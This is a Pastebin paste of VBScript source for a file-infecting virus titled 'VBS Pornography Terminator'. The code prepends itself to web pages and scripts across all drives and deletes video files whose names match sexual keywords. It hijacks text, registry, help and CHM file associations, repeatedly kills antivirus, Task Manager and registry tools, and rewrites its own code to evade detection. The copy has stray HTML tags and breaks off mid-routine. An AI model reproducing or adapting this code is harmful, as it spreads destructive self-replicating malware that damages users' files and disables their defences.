API tools faq
paste
FlyFar

HJLMR - VBS Pornography Terminator Virus Source Code

FlyFar
Mar 6th, 2023 (edited)
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 36.63 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. 'Administrator4
  2. 'HJLMRRQRWYOZX2_25
  3. Sub DeleteReg(strkey)
  4.     Dim tmps
  5.     Set tmps = CreateObject("WScript.Shell")
  6.     tmps.RegDelete strkey
  7.     Set tmps = Nothing
  8. End Sub
  9. Function ReadReg(strkey)
  10.     Dim tmps
  11.     Set tmps = CreateObject("WScript.Shell")
  12.     ReadReg = tmps.RegRead(strkey)
  13.     Set tmps = Nothing
  14. End Function
  15. Sub WriteReg(strkey, Value, vtype)
  16.     Dim tmps
  17.     Set tmps = CreateObject("WScript.Shell")
  18.     If vtype = "" Then
  19.         tmps.RegWrite strkey, Value
  20.     Else
  21.         tmps.RegWrite strkey, Value, vtype
  22.     End If
  23.     Set tmps = Nothing
  24. End Sub
  25. 'WQKAULMNKKG2_25
  26. 'HJLMRRQRWYOZX2_21
  27. Function IsSexFile(fname)
  28.     IsSexFile = False
  29.     If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
  30.                 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
  31.                 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
  32.         IsSexFile = True
  33.     End If
  34. End Function
  35. Function Isinfected(buffer, ftype)
  36.     Isinfected = True
  37.     Select Case ftype
  38.         Case "hta", "htm" , "html" , "asp", "vbs"
  39.             If InStr(buffer, Head_V) = 0 Then
  40.                 Isinfected = False
  41.             End If
  42.         Case Else
  43.             Isinfected = True
  44.     End Select
  45. End Function
  46. 'WQKAULMNKKG2_21
  47. 'HJLMRRQRWYOZX2_22
  48. Function GetSFolder(p)
  49.     Dim objfso
  50.     Set objfso = CreateObject(GetFSOName())
  51.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  52.     Set objfso = Nothing
  53. End Function
  54. Function GetUserName()
  55.     On Error Resume Next
  56.     Dim Value , UserName
  57.     Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
  58.     UserName = ReadReg(Value)
  59.     If UserName = "" Then
  60.         GetUserName = "Administrator"
  61.     Else
  62.         GetUserName = UserName
  63.     End If
  64. End Function
  65. Function GetFSOName()
  66.     On Error Resume Next
  67.     Dim Value , UserName
  68.     Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
  69.     UserName = ReadReg(Value)
  70.     If UserName = "" Then
  71.         GetUserName = "Scripting.FileSystemObject"
  72.     Else
  73.         GetFSOName = UserName
  74.     End If
  75. End Function
  76. Function GetHeadTail(l)
  77.     Dim Str , buffer
  78.     If l = 0 Then
  79.         GetHeadTail = "'" & GetUserName()
  80.     Else
  81.         buffer = GetUserName()
  82.         Str = ""
  83.         For i = 1 To Len(buffer)
  84.             Str = Mid(buffer, i, 1) & Str
  85.             GetHeadTail = "'" & Str
  86.         Next
  87.     End If
  88. End Function
  89. 'WQKAULMNKKG2_22
  90. 'HJLMRRQRWYOZX1_9
  91. Function ChangeModelOrder(vbsCode, Num_DNA)
  92.     On Error Resume Next
  93.     Dim DNA(), Array_vbsCode()
  94.     Dim i, Value, flag, j, buffer
  95.     ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
  96.     buffer = vbsCode
  97.     Randomize
  98.     For i = 1 To Num_DNA
  99.         Do
  100.             Value = Int((Num_DNA * Rnd) + 1)
  101.             flag = 1
  102.             For j = 1 To Num_DNA
  103.                 If Value = DNA(j) Then
  104.                     flag = 0
  105.                     Exit For
  106.                 End If
  107.             Next
  108.         Loop Until flag = 1
  109.         DNA(i) = Value
  110.     Next
  111.     For i = 1 To Num_DNA
  112.         Array_vbsCode(i) = GetModelCode(buffer, i)
  113.     Next
  114.     buffer = ""
  115.     For i = 1 To Num_DNA
  116.         buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
  117.     Next
  118.     ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
  119. End Function
  120. 'WQKAULMNKKG1_9
  121. 'HJLMRRQRWYOZX2_26
  122. Sub Run(ExeFullName)
  123.     Dim WshShell
  124.     Set WshShell = WScript.CreateObject("WScript.Shell")
  125.     WshShell.Run ExeFullName
  126.     Set WshShell = Nothing
  127. End Sub
  128. Sub CopyFile(objfso, code, pathf)
  129.     On Error Resume Next
  130.     Dim vf
  131.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  132.     vf.Write code
  133. End Sub
  134. Function ChangeName(vbsCode, Names)
  135.     Dim Name, j, temp, buffer
  136.     buffer = vbsCode
  137.     Randomize
  138.     For Each Name in Names
  139.         temp = ""
  140.         For j = 1 To Len(Name)
  141.             temp = temp & Chr((Int(Rnd * 26) + 65))
  142.         Next
  143.         buffer = Replace(buffer, Name, temp)
  144.     Next
  145.     ChangeName = buffer
  146. End Function
  147. 'WQKAULMNKKG2_26
  148. 'HJLMRRQRWYOZX2_16
  149. Sub SetTxtFileAss(sFilePath)
  150.     On Error Resume Next
  151.     Dim Value
  152.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  153.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  154. End Sub
  155. Sub SethlpFileAss(sFilePath)
  156.     On Error Resume Next
  157.     Dim Value
  158.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  159.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  160. End Sub
  161. Sub SetRegFileAss(sFilePath)
  162.     On Error Resume Next
  163.     Dim Value
  164.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  165.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  166. End Sub
  167. Sub SetchmFileAss(sFilePath)
  168.     On Error Resume Next
  169.     Dim Value
  170.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  171.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  172. End Sub
  173. 'WQKAULMNKKG2_16
  174. 'HJLMRRQRWYOZX2_12
  175. Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
  176.     On Error Resume Next
  177.     Dim tso, buffer, strCode , Maxsize
  178.     Maxsize = 350000
  179.     If fi.Size< Maxsize Then
  180.         Set tso = objfso.OpenTextFile(strPath, 1, True)
  181.         buffer = tso.ReadAll()
  182.         tso.Close
  183.         If T = 0 Then
  184.             Select Case ftype
  185.                 Case "hta", "htm", "html", "asp"
  186.                     If Isinfected(buffer, ftype) = False Then
  187.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  188.                         strCode = MakeScript(VbsCode_WebPage, 0)
  189.                         tso.Write strCode & VBCRLF & buffer
  190.                         Cnt = Cnt + 1
  191.                     End If
  192.                 Case "vbs"
  193.                     If Isinfected(buffer, ftype) = False Then
  194.                         n = InStr(buffer , "Option Explicit")
  195.                         If n<>0 Then
  196.                             buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  197.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  198.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  199.                             Cnt = Cnt + 1
  200.                         Else
  201.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  202.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  203.                             Cnt = Cnt + 1
  204.                         End If
  205.                     End If
  206.                 Case Else
  207.                     '
  208.                    '
  209.            End Select
  210.         ElseIf T = 1 Then
  211.             If Isinfected(buffer, ftype) = True Then
  212.                 n = InStrRev(buffer , Tail_V)
  213.                 If n<>0 Then
  214.                     buffer = Replace(buffer, Tail_V, "", n, 1, 1)
  215.                     Set tso = objfso.OpenTextFile(strPath, 2, True)
  216.                     tso.Write strCode & VBCRLF & buffer
  217.                 End If
  218.             End If
  219.         End If
  220.     End If
  221. End Sub
  222. 'WQKAULMNKKG2_12
  223. 'HJLMRRQRWYOZX2_17
  224. Function PreInstance()
  225.     On Error Resume Next
  226.     Dim num_cnt
  227.     Dim strComputer, objWMIService, colProcessList, objProcess
  228.     num_cnt = 0
  229.     PreInstance = False
  230.     strComputer = "."
  231.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  232.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  233.     For Each objProcess in colProcessList
  234.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  235.             num_cnt = num_cnt + 1
  236.         End If
  237.     Next
  238.     If num_cnt>= 2 Then
  239.         PreInstance = True
  240.     End If
  241. End Function
  242. 'WQKAULMNKKG2_17
  243. 'HJLMRRQRWYOZX1_8
  244. Sub RestoreSystem(objfso)
  245.     On Error Resume Next
  246.     Dim Value, dc, d, HCULoad
  247.     Call SafeSet()
  248.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  249.     If ReadReg(HCULoad) = FullPath_V1 Then
  250.         Call DeleteReg(HCULoad)
  251.     End If
  252.     Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
  253.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  254.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  255.     End If
  256.     Value = "regedit.exe " & """%1"""
  257.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  258.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  259.     End If
  260.     Value = GetSFolder(1) & "hh.exe " & """%1"""
  261.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  262.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  263.     End If
  264.     Value = "%SystemRoot%\system32\winhlp32.exe %1"
  265.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  266.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  267.     End If
  268.     Value = """%1"" %*"
  269.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
  270.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
  271.     End If
  272.     Set dc = objfso.Drives
  273.     For Each d In dc
  274.         If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
  275.             objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
  276.             objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
  277.         End If
  278.     Next
  279.     If objfso.FileExists(FullPath_V1) = True Then
  280.         Set vf = objfso.GetFile(FullPath_V1)
  281.         vf.Delete
  282.     End If
  283.     If objfso.FileExists(FullPath_V0) = true Then
  284.         Set vf = objfso.GetFile(FullPath_V0)
  285.         vf.Delete
  286.     End If
  287.     If objfso.FileExists(FullPath_Config) = True Then
  288.         objfso.DeleteFile FullPath_Config , True
  289.     End If
  290. End Sub
  291. 'WQKAULMNKKG1_8
  292. 'HJLMRRQRWYOZX1_5
  293. Sub MonitorSystem(objfso, vbsCode)
  294.     On Error Resume Next
  295.     Dim ProcessNames
  296.     ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
  297.     Do
  298.         Call KillProcess(ProcessNames)
  299.         Call InvadeSystem(objfso, vbsCode)
  300.         WScript.Sleep 5000
  301.     Loop
  302. End Sub
  303. 'WQKAULMNKKG1_5
  304. 'HJLMRRQRWYOZX1_4
  305. Function Head()
  306.     Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
  307.     "On Error Resume Next" & VBCRLF &_
  308.     "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
  309.     "Dim ModelHead, ModelTail" & VBCRLF &_
  310.     "Cnt = 0" & VBCRLF &_
  311.     "CntMax = 1000" & VBCRLF &_
  312.     "Version = ""4""" & VBCRLF &_
  313.     "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
  314.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  315.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  316.     "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
  317.     "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
  318.     "Sum_ModelCode = 26" & VBCRLF &_
  319.     "Head_V= GetHeadTail(0)" & VBCRLF &_
  320.     "Tail_V= GetHeadTail(1)" & VBCRLF &_
  321.     "ModelHead=""'HJLMRRQRWYOZX""" & VBCRLF &_
  322.     "ModelTail=""'WQKAULMNKKG""" & VBCRLF
  323. End Function
  324. Function VictimHead()
  325.     VictimHead = Head() & VBCRLF &_
  326.     "Call VictimMain()" & VBCRLF &_
  327.     "Sub VictimMain()" & VBCRLF &_
  328.     "   Call ExeVbs_Victim()" & VBCRLF &_
  329.     "End Sub" & VBCRLF &_
  330.     "'WQKAULMNKKG1_1" & VBCRLF
  331. End Function
  332. Function <span class="searchlite">Virus</span>Head()
  333.     <span class="searchlite">Virus</span>Head = Head() & VBCRLF &_
  334.     "Call <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  335.     "Sub <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  336.     "   On Error Resume Next" & VBCRLF &_
  337.     "   Call ExeVbs_<span class="searchlite">Virus</span>()" & VBCRLF &_
  338.     "End Sub" & VBCRLF & VBCRLF &_
  339.     "'WQKAULMNKKG1_1" & VBCRLF
  340. End Function
  341. Function WebHead()
  342.     WebHead = Head() & VBCRLF &_
  343.     "Call WebMain()" & VBCRLF &_
  344.     "Sub WebMain()" & VBCRLF &_
  345.     "   On Error Resume Next" & VBCRLF &_
  346.     "   Call ExeVbs_WebPage()" & VBCRLF &_
  347.     "End Sub" & VBCRLF &_
  348.     "'WQKAULMNKKG1_1" & VBCRLF
  349. End Function
  350. 'WQKAULMNKKG1_4
  351. 'HJLMRRQRWYOZX2_20
  352. Function GetModelCode(vbsCode, N_ModelCode)
  353.     On Error Resume Next
  354.     Dim n, n1, buffer
  355.     buffer = vbsCode
  356.     If N_ModelCode>= 1 And N_ModelCode<= 9 Then
  357.         n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
  358.         n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
  359.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
  360.     ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
  361.         n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
  362.         n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
  363.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
  364.     ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
  365.         n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
  366.         n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
  367.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
  368.     End If
  369. End Function
  370. 'WQKAULMNKKG2_20
  371. 'HJLMRRQRWYOZX1_2
  372. Sub ExeVbs_WebPage()
  373.     On Error Resume Next
  374.     Dim objfso, vbsCode, VbsCode_Virus
  375.     Set objfso = CreateObject(GetFSOName())
  376.     vbsCode = GetScriptCode("vbscript")
  377.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  378.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  379.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  380.     Set objfso = Nothing
  381. End Sub
  382. Sub ExeVbs_Victim()
  383.     On Error Resume Next
  384.     Dim objfso, vbsCode, VbsCode_Virus
  385.     Set objfso = CreateObject(GetFSOName())
  386.     vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
  387.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  388.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  389.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  390.     Call Run(FullPath_V1)
  391.     Set objfso = Nothing
  392. End Sub
  393. 'WQKAULMNKKG1_2
  394. 'HJLMRRQRWYOZX2_11
  395. Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
  396.     On Error Resume Next
  397.     Dim pfo, pf, pfi, ext
  398.     Dim psfo, ps
  399.     Set pfo = objfso.GetFolder(strPath)
  400.     Set pf = pfo.Files
  401.     For Each pfi In pf
  402.         If Cnt >= CntMax Then
  403.             Exit For
  404.         End If
  405.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  406.         Select Case ext
  407.             Case "hta", "htm", "html", "asp", "vbs"
  408.                 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
  409.             Case "mpg", "rmvb", "avi", "rm"
  410.                 If IsSexFile(pfi.Name) = True Then
  411.                     pfi.Delete
  412.                 End If
  413.         End Select
  414.     Next
  415.     Set psfo = pfo.SubFolders
  416.     For Each ps In psfo
  417.         If Cnt >= CntMax Then
  418.             Exit For
  419.         End If
  420.         Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
  421.     Next
  422. End Sub
  423. 'WQKAULMNKKG2_11
  424. 'HJLMRRQRWYOZX2_10
  425. Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
  426.     On Error Resume Next
  427.     Dim d , dc
  428.     Set dc = objfso.Drives
  429.     For Each d In dc
  430.         If Cnt >= CntMax Then '
  431.            Exit For
  432.         End If
  433.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  434.             'If d.DriveType = 1 Then
  435.            Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
  436.             'End If
  437.        End If
  438.     Next
  439. End Sub
  440. 'WQKAULMNKKG2_10
  441. 'HJLMRRQRWYOZX1_3
  442. Sub ExeVbs_<span class="searchlite">Virus</span>()
  443.     On Error Resume Next
  444.     Dim objfso, objshell, FullPath_Self, Name_Self, Names
  445.     Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
  446.     Dim Order, Order_Order, Order_Para
  447.     Dim vbsCode , VbsCode_<span class="searchlite">Virus</span>, VbsCode_WebPage, VbsCode_Victim , MainBody
  448.     Set objfso = CreateObject(GetFSOName())
  449.     Set objshell = CreateObject("WScript.Shell")
  450.     FullPath_Self = WScript.ScriptFullName
  451.     Name_Self = WScript.ScriptName
  452.     Names = Array("HJLMRRQRWYOZX", "WQKAULMNKKG")
  453.     Set oArgs = WScript.Arguments
  454.     ArgNum = 0
  455.     Do While ArgNum < oArgs.Count
  456.         Para_V = Para_V & " " & oArgs(ArgNum)
  457.         ArgNum = ArgNum + 1
  458.     Loop
  459.     SubPara_V = LCase(Right(Para_V, 3))
  460.     Select Case SubPara_V
  461.         Case "run"
  462.             RunPath = Left(FullPath_Self, 2)
  463.             Call Run(RunPath)
  464.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  465.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  466.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  467.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  468.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  469.             Call Run(FullPath_V1)
  470.         Case "txt", "log"
  471.             RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
  472.             Call Run(RunPath)
  473.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  474.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  475.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  476.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  477.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  478.             Call Run(FullPath_V1)
  479.         Case "reg"
  480.             Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
  481.             Call Run(Para_V)
  482.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  483.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  484.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  485.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  486.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  487.             Call Run(FullPath_V1)
  488.         Case "chm"
  489.             Para_V = "hh.exe " & """" & Trim(Para_V) & """"
  490.             Call Run(Para_V)
  491.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  492.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  493.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  494.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  495.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  496.             Call Run(FullPath_V1)
  497.         Case "hlp"
  498.             Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
  499.             Call Run(Para_V)
  500.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  501.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  502.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  503.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  504.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  505.             Call Run(FullPath_V1)
  506.         Case Else
  507.             If PreInstance = True Then
  508.                 WScript.Quit
  509.             End If
  510.             If IsOK(objfso, Date(), FullPath_Config) = False Then
  511.                 If objfso.FileExists(FullPath_Config) = True Then
  512.                     Order = Trim(ReadOK(objfso, FullPath_Config))
  513.                     Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
  514.                     Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
  515.                 End If
  516.                 Select Case Order_Order
  517.                 Case "InfectFiles"
  518.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  519.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  520.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  521.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  522.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  523.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  524.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  525.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  526.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  527.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  528.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  529.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  530.                     Order_Para = Order_Para + Cnt
  531.                     If Order_Para>2000 Then
  532.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  533.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  534.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  535.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  536.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  537.                     Order_Para = Order_Para + Cnt
  538.                     If Order_Para>2000 Then
  539.                         Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465*** -_- !")
  540.                     Else
  541.                         Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
  542.                     End If
  543.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  544.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  545.                 Case "Msg"
  546.                     MsgBox Order_Para
  547.                     Call WriteOK(objfso, FullPath_Config, "", "")
  548.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  549.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  550.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  551.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  552.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  553.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  554.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  555.                 Case "UnLoadMe"
  556.                     Call RestoreSystem(objfso)
  557.                     Wscript.Quit
  558.                 Case "Kill<span class="searchlite">Virus</span>"
  559.                     Call RestoreSystem(objfso)
  560.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
  561.                     Wscript.Quit
  562.                 Case Else
  563.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  564.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  565.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  566.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  567.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  568.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  569.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  570.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  571.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  572.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  573.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  574.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  575.                     Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
